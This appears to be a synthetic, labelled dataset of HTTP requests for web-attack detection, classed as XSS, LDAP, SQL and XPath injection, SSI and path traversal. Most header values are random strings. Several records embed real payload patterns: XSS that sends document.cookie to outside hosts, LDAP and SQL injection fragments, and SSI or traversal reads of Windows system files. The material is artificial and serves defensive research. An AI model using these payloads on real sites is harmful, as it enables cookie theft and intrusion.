Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 011740300898
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

w9LFP2=4227041&fb_9=axyOi' boot.ini5 8&heat7hehe=m30DR7PCXfVK&t7oaedblseerD1=")(targetfilter=(o=NetscapeRoot))&e4bsaQeaR=ohnp&5rmIGTP=a&onmsaadkxssne=retebneyralldhoise&ArIimgV=44&EO76DaSeSU=61532744&mot1Ntlq80ctn=iEcs&7DPychildu71Y_= i&ar&Mtfa=tze/

End - Id: 37634
Start - Id: 47606
class: XSS
GET /en/WA/e3ED..jpeg?LT=00356&ftd=hhea&N48BDIt=nw&ehIruqssi=075340705&lcaj8ieepenrdob=hre&anqi0z9o=6963556&1A=nZHRkFk8ju8&81X6=%3Cdiv+++style++%3D%22+++++width%3A++expression%28%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.or.com%2Fcgi-bin%2Fitmastie.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++%22+++%3E&bomtaifutfEawty=t%5DgRo55croMrnvu7&uDHJ=an&r5avaeTta5pp=su4&tn=zw0i&iT8smrstzt=54&ite4d=oZcCNt4n HTTP/1.0
Host: www.ag2eemtEoR.gov:80
Connection: close
Accept: image/*;q=0.7, video/quicktime;q=0.4, audio/basic;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 179.141.108.140
Cookie: qtt4B8ncp=formarph;-netcatkEYlEEPI=2411
Cookie2: $Version="75"
Date: Thu, 27 Sep 07 05:51:57 GMT
ETag: "nwTH@gkWC5HyBDgr7v"
Expect: pUonr4u1
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 849916-
Referer: /cliBe/jtenhi/tanid.mspx
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: 26Oh6mMsdyrse
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: HTTP/2.6 248.20.67.74, 0.8 www.ocdy9ie.jpg, 2.1 33.36.17.255
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 779 www.tenh.tiff "Ceiaa" "Sun, 15 Feb 09 12:38:53 UTC"
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47606
Start - Id: 38989
class: LdapInjection
GET /rae/jbodygaccepto_/cwqKwQB/rzXWjwonEFIYBm/nYG_z/wAFmFPfOZWjA47LRtnYn/jaw/im.gif?tuk623=olMtcgQTIQ.0&vlf=ris&hta1ke=o%407Sq0z&oeletnse1rhsf=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&uhe3mqjrtars=354771&etolmrr=wt&x2na=sIJTXYTqHUTn&ACey1e8niaieial=t0a+u%25&rw7srdrznqcd7y=D3it&m80r=nOss5epeodounbarwq&maeetAuklft=NcibtuiYtehmgrl HTTP/1.0
Host: 102.64.131.22
Connection: pc9w
Accept: audio/basic;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: YmYaoi-zteo, tceOj2oe-j093mtob, aBSn-e;q=0.3, oiefTtoi-dan4
Cache-Control: max-age=98
Client-ip: 223.192.79.45
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Thu, 07 Jun 07 20:16:48 UTC
ETag: W/"Zl1tLfUymxvB3V8"
Expect: 100-continue
From: nuirrts@cnoeRGT.ch
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 4784
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest username="e7ozca"
Range: 2-,-247703
Referer: http://eeiai.st/vptsh.nsf
TE: deflate
Trailer: Date
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 8.6; mn-Aa; rv:8.6.1) Gecko/33600046
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: HTTP/6.7 176.17.248.123, 9.3 www.vbhw.jpeg, 4.4 www.dnsR3he.js
Transfer-Encoding: gzip
Upgrade: ir0/8.9, deh7/6.4
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38989
Start - Id: 39008
class: LdapInjection
PUT /oJP58AENrH1cVhOer1/uBs0eJEhCnu3k98@HWZ/udwdt/bJfwMwVf/ogb7grqDm9/Tk8bGusrq@PikIyinS/h-fRnpth/rweOsawsowi/dkH.ZSp2/oocu/8oeaohzmdthr9ega/te9he0be07O.htm? HTTP/1.0
Content-Length: 197
Content-Language: aeyjp,nsit1vr
Content-Encoding: identity
Content-Location: http://txnalr.biz/ttm5dy/to4aR.js
Content-MD5: aXNqYTJ6aGR0MTVlbmFhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Feb 08 09:14:40 UTC
Last-Modified: Wed, 16 Dec 09 23:05:46 GMT
Host: 133.157.206.133
Connection: tN7a
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.6, iso-8859-4, euc-cn;q=0.6
Accept-Encoding: )  ( |    (displayName=had*)    (name   =had*    )(    mail=had* )
Accept-Language: jath-i;q=0.8, dhlar-hh;q=0.9, o-ehao, Bg1eyw-tiIv2
Cache-Control: only-if-cached
Client-ip: 40.10.105.255
Cookie: orsseerl9l4=s
Cookie2: $Version="84"
Date: Sun, 17 Oct 04 13:22:21 CET
ETag: W/"Pyd87k1Qm0CacE8"
Expect: 9OgnnhD
From: aa3e@ldqettoe.de
If-Modified-Since: Sat, 24 Jan 04 21:31:54 CET
If-Unmodified-Since: Wed, 23 Apr 08 13:29:06 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 588
MIME-Version: 4.7
Pragma: 7yqtnhh='4ibtto'
Proxy-Authorization: Basic YW5tc2U3OmJob3MzbA==
Authorization: Basic cnJlZXpybjoxZWhOcg==
Referer: http://woahoweo.uk/g5eRtee/ipa9/tdBc/em5mnNt/tiitoeoh.php
TE: gzip;q=0.3
Trailer: Expect
User-Agent: hdbty25 (hn6oCN1d; hpSOpGZwk5; gbEQRQ0; sFrlD7ZtC)
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: FTP/5.5 45.231.83.216, 9.1 44.162.178.114, 5.3 www.r8rri.png:098
Transfer-Encoding: Oruh
Upgrade: li7sr/6.8, rawA/9.1, eoh3s/1.0, 7rs/2.6, nwr/4.9
Warning: 432 168.160.241.145 "eHcyidsz" 
X-Forwarded-For: 137.88.250.0
X-Serial-Number: 168824

liana09=reE&cIXBfsystemrh=tare&tg=hdhcvesn tpe&2gormibseinIm=r|el&t3ihywut2o=>d&uooyizq9elm=c4_ZLo&osdlr9ni7=[&5i7seenfe=wbsnnhAA&rdweru=anoa0lt6gcu&1eotMbzaoybea=1te3ee 3)&4bhno10sh=enph-h

End - Id: 39008
Start - Id: 45173
class: PathTransversal
GET /./? HTTP/1.1
Host: 57.169.30.21:3
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, deflate, gzip, compress;q=0.7
Accept-Language: t-1rUidtq, one3r-nepn6y, e-iptuifds, r-D;q=0.2, slTad-m;q=0.6
Cache-Control: only-if-cached
Client-ip: 49.63.221.221
Cookie: eOssErdweHee2tl=CeINrafoeoe8tos;gsoe8= ]en/oirhveagroup byaddimgcsS
Cookie2: $Version="70"
Date: Thu, 04 Jun 09 12:32:50 GMT
ETag: W/"nusweEuleB7R8Ih"
Expect: sozKtin=eeRl
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 287
MIME-Version: 0.7
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest nonce
Authorization: ttiwh soogktu=nltw
Range: 551-3881,-846
Referer: http://ihw8md.it/ktjtacpe/w9ttuGe3/adnedala/pnikye/d3erjnt.mpg
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 3.5; ar-wS; rv:7.5.1) Gecko/64365694
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: HTTP/7.7 www.Tcns.png
Transfer-Encoding: identity
Upgrade: iis5w/2.9, 8fLc/3.7, wahe/2.1, ossrxy/5.0
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45173
Start - Id: 35104
class: SqlInjection
GET /eO1n0DO/eNeNhs4/AolBn/iWV/nareuszrudr0x6hf3e/aeuhtaaatoeu/rgzMY-2d1uXcyH6/rm/9eact/ebgbe/Wbl.html? HTTP/1.0
Host: www.olAAgpo.net
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, koi8, iso-8859-7;q=0.8
Accept-Encoding: 
Accept-Language: r-s1m4yf, E7idp-ieS
Cache-Control: max-age=9
Client-ip: 70.71.172.13
Cookie: TWw3=and     0<>(select   count(*)     from drInMe   where   ec<>)
Date: Wed, 16 Feb 05 09:09:20 UTC
ETag: W/"uXLAnVyI2YO5H0m"
Expect: 100-continue
From: n0irerih@toa3Ih.de
If-Modified-Since: Wed, 15 Jul 09 24:29:39 GMT
If-Unmodified-Since: Fri, 12 Mar 04 23:27:36 CET
If-Match: "BB-K61fJWRYXUnjb8n"
If-None-Match: *
If-Range: Wed, 27 May 09 05:06:47 GMT
Max-Forwards: 724
MIME-Version: 7.7
Pragma: uhq4e='oc'
Proxy-Authorization: Basic dVdybjpKaXA3cTVl
Authorization: Basic Zm9wWmhvZTpvZWJ1
Referer: /lIiw8Iw.swf
TE: trailers,gzip;q=0.8
Trailer: Range
User-Agent: mytecpesrhnvzomt
UA-CPU: Sparc
UA-Disp: 8002,5370,32
UA-Color: color16
Via: 5.7 128.135.77.28, 6.4 www.hlttxS.htm
Transfer-Encoding: compress
Upgrade: dfI4sw/5.1, ernkl3/0.1, sengI/2.1, s7rr/2.3, 8aLer/5.7
Warning: 088 www.ikdrEas.html "7m4m2tsnwpDd2eb" "Sun, 10 Sep 06 14:00:47 UTC"
X-Forwarded-For: 218.200.137.201
X-Serial-Number: 05695967231416
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35104
Start - Id: 48091
class: XSS
GET /R@kwRV4lHkq/exltry-Zv58UOJ/n2XZRr/cZROq2rlm42TQ1rPf3/eC503DYOuWl2Mj/dDnQxeQ-IwuG/uHPww6CZT4xu/sgtzeeEWeHQ/nOaiorqtsde/el6h6srat/qJt9xADME5.msf?tqehyertOogbn=5577869&srttllhnott=5379598173&hTi=sRE8yxi-a&tvtNot=619691&eaencre=4383314&1v1ixeee=aehrc&hoeeh0lo=vae+r&qo=av%40etla0rtq+ewurdbh&ta=%3Cbody++onload+%3D+%22%5Bwindow.open%28%27http%3A%2F%2F48.221.20.246%2Fetni.asmx%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E HTTP/1.1
Host: www.elvt.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 206.209.94.55
Cookie: 5sgbBphb=tx3dp9;mot49cu=eg-;aln=iwonleytmexKdaeut
Cookie2: $Version="484"
Date: Tue, 06 Mar 07 02:26:46 CET
ETag: W/"f2Ef.UQP5@VK81BRTV"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: *
If-None-Match: "GcE-g2tQMoCO8S4zzc4N"
If-Range: Tue, 26 Jan 10 12:22:26 UTC
Max-Forwards: 4797
MIME-Version: 2.8
Pragma: 8eei8s=PEcrap
Proxy-Authorization: NTLM NWRlb1JzZXRwOFppblVlMG5kaGNlZWlRb1hhNG1xZW5tYmg4N0x0dzc=
Authorization: Digest algorithm=MD5
Range: -179295,540225-63
Referer: /R0wriyf/cBIqste/hdD4a.js
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: 9mnntRt (iHza0KzhX; ncUaZ.tkz)
UA-CPU: Sparc
UA-Disp: 367,260,16
UA-OS: Win95
UA-Pixels: 6001x2247
Via: HTTP/0.9 97.240.1.246, 0.6 67.131.86.140, njhoOo/4.4 173.241.197.147:504
Transfer-Encoding: deflate
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 356 www.tzeinr.css "til8sinolr" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48091
Start - Id: 38543
class: LdapInjection
GET /eRo.3xfWVcNEZ_/cnNJr3KD/bIpVlbK9ht4S/d@jgkzE2o2.I@Mk/o@RqkWdpXL@rl./eh/hvgs/51xfFyLewp-/izCzt4/ayxf3Tfzy2/w2nthtsisemsd/iriyb8Hd.asmx?9aS=18&gtnwewLinaEdn=9612%29%28%26%28objectClass%3Do6i%29%28%7C%28sn++%3D++aas%29%28cn%3Dexab+++J*%29%29&wjrSifaamnH1gm=81447&ilon8iptenlnse=4143617&dsqnkzftu=k&xLstOt0tSa=eE&ena2rmtmyt8ep=etE7pdG4 HTTP/1.0
Host: 78.74.159.165
Connection: close
Accept: application/*;q=0.6, image/png;q=0.4, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=22
Client-ip: 137.169.169.214
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="4"
Date: Fri, 17 Jun 05 11:13:59 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: yyiraR
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 04 Oct 04 24:01:58 CET
If-Unmodified-Since: Fri, 09 Nov 07 09:51:35 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 02:27:49 GMT
Max-Forwards: 8305
MIME-Version: 3.2
Pragma: ov07eii='aehosrn'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Basic RTU5ZXA3czM6ZXdEdnlnbW4=
Range: 447-,158917-
Referer: http://knash.ch/anlbQy/l0rga.cgi
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.5 (compatible; MSIE 5.4; Win 9x; j7yanio; htcfier8)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: 2.3 157.122.93.120
Transfer-Encoding: identity
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38543
Start - Id: 35546
class: XPathInjection
POST /8jlU1positionZVBSi/lzWBV/omdnd8ttntsc5jl/eOA0_/3Aiposition/lH9dmperl0WEAechoDU/Lrinxstdin6_netcatscriptN@ayu/Gnshutdownhttpc5iI/nF6v4/aDzWYDU4EHTd/Rhiei0tt4e4tfwNespe.gif? HTTP/1.0
Content-Length: 263
Content-Language: i,rthd,aG
Content-Encoding: gzip
Content-Location: /Notn/b6staey/Tidmxten/scwbhe/3teu6lc.jsp
Content-MD5: ZWVpYXNvZjNnYXVzOU5mbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Sep 09 24:49:44 GMT
Last-Modified: Thu, 12 Nov 09 20:53:59 UTC
Host: www.95nkatz.ch
Connection: n162
Accept: */*
Accept-Charset: x-mac-ce;q=0.5, cp-936;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 20.198.192.186
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sun, 16 Sep 07 06:35:52 GMT
ETag: W/"NVeYXAYynVJ6NfI.SKRd"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Wed, 12 Aug 09 04:37:38 CET
If-Unmodified-Since: Sun, 25 Apr 10 06:11:16 UTC
If-Match: "w5zN0vj4csCx6..4"
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: "EGN7EWnDVpWSVv@psEe7"
Max-Forwards: 94
MIME-Version: 7.5
Pragma: kKhM='d'
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest qop=bhejopd
Range: -15,703-20624,9752-7
Referer: /7Rii.avi
TE: trailers
Trailer: Accept-Language
User-Agent: oilme0unl/8.1.1.0
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 502x021
Via: 9.0 89.46.11.46
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sacni=4&VO9T6rmRnph-zZN4=2&Daasnhhtacces6&MmetaXRIEvW=(i  <  count(rta/child::text()) and     j <   count(iee/child::comment()) and   k   <     count(acxtu0/child::*)   )&qS=1344119&tvpa='g&cit0dpest=|;@Et

End - Id: 35546
Start - Id: 38919
class: LdapInjection
GET /tcurtorTeEat6egrneci/oQQsUv/e8Sab5Guil9jzEg.jpeg?iie=tTdeo%29%28%26%28objectClass++++%3D+++ey*%29&trye1Nimhna=dkh9ZWQ&ehtaccesX@u4dropIZT=tLautoexeci+%7Eitutteh%7Cr8e HTTP/1.1
Host: 83.71.236.187
Connection: close
Accept: audio/*, video/*, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=90431
Client-ip: 200.72.166.1
Cookie: eDvitioop8e=84737;iaa4oeRpo=i1/er;1rEeaElldtwsh=sd3iyXUGG;eosutttE=sesortnemtn8hdsihw;ueaszsilatpEr=ePhaoneEti2boinaid;rseejthEhH=05
Cookie2: $Version="625"
Date: Wed, 05 May 04 03:14:40 UTC
ETag: "Qun6rhfH2clVNXQ16O"
Expect: 100-continue
From: g0ftcpby@2esla.fr
If-Modified-Since: Fri, 22 Feb 08 17:29:51 GMT
If-Unmodified-Since: Wed, 18 Jan 06 21:07:27 GMT
If-Match: "NW.lywRVriUcM-xq7oWL"
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: Thu, 17 Sep 09 04:51:04 CET
Max-Forwards: 8
MIME-Version: 7.2
Pragma: v=uoE
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: ni6tio ogto9ix=ashae
Range: -80225,-8,-43269
Referer: /iifee3oo/uhcW/eqi9e/tpd6AA/ttsae.mdb
TE: chunked;q=0.6,gzip;q=0.5
Trailer: Pragma
User-Agent: rJM.Xc http://www.tidsl.org
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 1628x672
Via: 4.1 www.rqeoety.jpg, FTP/0.0 63.116.170.53, 6.4 42.0.13.189
Transfer-Encoding: gzip
Upgrade: ktd/9.4, ytmtr/3.4, aSi3/3.1
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38919
Start - Id: 40714
class: SSI
PUT /eOYq9d6/0JqjepnJv/oet5eytdelareInfidh/f.Z.css? HTTP/1.1
Content-Length: 235
Content-Language: T
Content-Encoding: compress
Content-Location: /sw6inc6z/0fosev/aiNurew.sh
Content-MD5: cnRzYTVlb3RnQ3ltd2kxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Aug 06 07:02:12 UTC
Last-Modified: Fri, 01 Jul 05 11:32:59 UTC
Host: 190.76.29.189
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: yhmoogoo='2'
Client-ip: 137.245.61.95
Cookie: 7cP6=tuu1 oaxfeits;I66p9=D nconnecteteEa\ee;foiuNg=<!--   #include   virtual="c:\winnt\system.ini"    -->
Cookie2: $Version="205"
Date: Sun, 11 Feb 07 20:58:14 CET
ETag: W/"nL0KycLiDw7a5M2D.4"
If-Modified-Since: Sat, 21 Oct 06 03:32:49 GMT
If-Unmodified-Since: Sat, 16 May 09 12:27:59 CET
If-Match: *
If-None-Match: *
If-Range: "r6mSgb5-Ux.si_TN"
Max-Forwards: 841
Pragma: no-cache
Proxy-Authorization: Basic bmVncnVmOmFyaW1uaW9s
Authorization: Digest opaque="a8bredw"
Range: 6-,2407-,610-07
Referer: http://snen4.uk/nau8/neow/nyrs/anou/sroht.swf
TE: deflate;q=0.1
User-Agent: Mozilla/1.2 (compatible; Konqueror/5.5; WinNT; ntiv)
UA-Color: color8
Via: 9.8 www.wcrksR.gif, HTTP/1.6 www.nnhsN.jpeg, 9.0 www.ixmfyete.gif:2693
Transfer-Encoding: compress
Upgrade: ity3/2.8, ahh/0.9, 2Tst/9.8, dNhmme/4.0
Warning: 560 www.xrgnc.css "ttieselHewtheIaoLOto" "Wed, 23 May 07 17:26:30 GMT"
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nmeIr=08599308&4Ilevrtnsa3so=5144&i2hijn=ok0y&Zt=t7afmiptc&ccpef6=067&ghc0duwpgDN=aea)Iss&3xLttejAt=t-rem&seteph=993&etcthlqnvlut=atvcsaetxmicr9taP&pheaodrtiw1d=dt@sosiipecatzls rdyHit&ehpEptlm5bgi= q&seae3aIwPeSnrH=A4y0tshxpsqe8x 

End - Id: 40714
Start - Id: 47581
class: XSS
GET /bOZrQRCT-H.U31/iioeg/5H2AXRuuIReeO.mdb?DIRd5clQ=GniethTPsei4a&oNxnwXilo=31810641&eestsnilHhOt=990572&stES=%3Cimg++++dynsrc++%3D+%22++++javascript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.illeon.com%2Fcgi-bin%2Flasionisve.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E&zehrvzZppe7qga=082931&CNHnph-WHAqEww=8hiARP7&cBCPjCvFB=fwoxukFVIf.&a7eHesN826ehf=3679&tT=eoNopenvi+pY%3DsmetaSA%28&iaVnTfu=iKr HTTP/1.1
Host: 146.69.143.59:0
Connection: keep-alive
Accept: application/postscript;q=0.3, text/html, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity, gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 118.106.166.150
Cookie: yso8reay=a5TPe
Cookie2: $Version="3"
Date: Tue, 16 May 06 04:12:43 CET
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 2eEi8
From: i5nNat@viikl.cz
If-Modified-Since: Tue, 22 Apr 08 07:36:03 CET
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: lttc 1geto=iareHg
Authorization: NTLM dHZhc2VzeVNvbXNnYXNobGg1bmU1bGFkbW9tbzl2OGF0cjZzdHU=
Range: 7-,-18566
Referer: http://iyHo.fr/ktdfYn/otcace/6R7nb/Spomcth.asmx
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: rlsdeqdzOtbtem7u7en
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 205 168.163.244.39 "rui0nun" "Thu, 26 Jan 06 03:08:13 CET"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47581
Start - Id: 45493
class: PathTransversal
GET /yusd1ce/H@mmTe-GB/ncottzsie9YHddLei/Rc2Hwhere9TMylx@.maila/umVu/AesDnaot6/gw/ecnv-jvpUcV/d5amteSiv5ut8wi/toeLd/gloede5gylA0ehbon4j.jpg?2tf=%3E&oroim4z3nS24w=2dfd&zK71mT=%5CWINNT%5Csystem.ini&rutf6uas=uyZb%40YClt2Cj&uRegoa3bbeA=37101935&EslniaornD0=hhtmhT9yiNnodm&milohn1tefkn6xS=272947035 HTTP/1.1
Host: www.hmhn0laei.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: x3jnmaad-ioeS2n;q=0.5, bEr-to;q=0.2
Cache-Control: no-cache
Client-ip: 165.251.254.128
Cookie: rmTesatztRg5Eo=76916
Cookie2: $Version="05"
Date: Mon, 05 Jul 04 10:12:23 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Mon, 21 Mar 05 05:10:53 GMT
If-Unmodified-Since: Wed, 30 Nov 05 01:59:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5914
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM VXRlZ290YnM0YU50ZjJsSWNoc3RqSWxtc2lvZU9pbXJuRWU=
Authorization: Basic ZHJvZXJ6dDpuYnU1OWVuYQ==
Range: 7-
Referer: http://www.9aeo.cz/tigrnqni/dao9/rtgsuhac/s0qa/e4ete.asp
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.5 (Windows; U; WinNT 9.9; na-vt; rv:1.3.8) Gecko/95861026
UA-CPU: MIPS
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: HTTP/7.7 www.IoatOhw.js:1, HTTP/5.1 www.um2hd.htm
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45493
Start - Id: 47518
class: XSS
GET /eQ4M1Lk/vZps-stdin.gif?ea=%3Cdiv+style++%3D+%22+width%3A++expression%28%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.redeerri.com%2Fcgi-bin%2Fol.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+%3E HTTP/1.1
Host: www.calah.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: rn5='ovVaha'
Client-ip: 2.40.61.206
Cookie: pisoeh=655;4ezrotin5N=fc
Cookie2: $Version="7"
Date: Wed, 04 Aug 04 20:31:03 GMT
ETag: W/"s1G3EZJ-VlE1KaRun"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Fri, 02 Jun 06 23:46:46 CET
If-Unmodified-Since: Sat, 24 Jul 04 10:25:37 CET
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: "4SpxioGT6a-3xTdUAB"
If-Range: *
Max-Forwards: 768
MIME-Version: 9.4
Pragma: es=ssini
Proxy-Authorization: solli r3h4i=aotni1
Authorization: Basic c2lhY1Q3eTpuZWRj
Range: 22-,852303-,3-
Referer: /eAu4of/oebrMp8/hda5a4h/tfstoOSa.js
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: oexer/2.4.3
UA-CPU: PowerPC
UA-Disp: 017,391,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 7.7 114.224.208.33
Transfer-Encoding: identity
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 32.118.162.121
X-Serial-Number: 870651819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47518
Start - Id: 47303
class: XSS
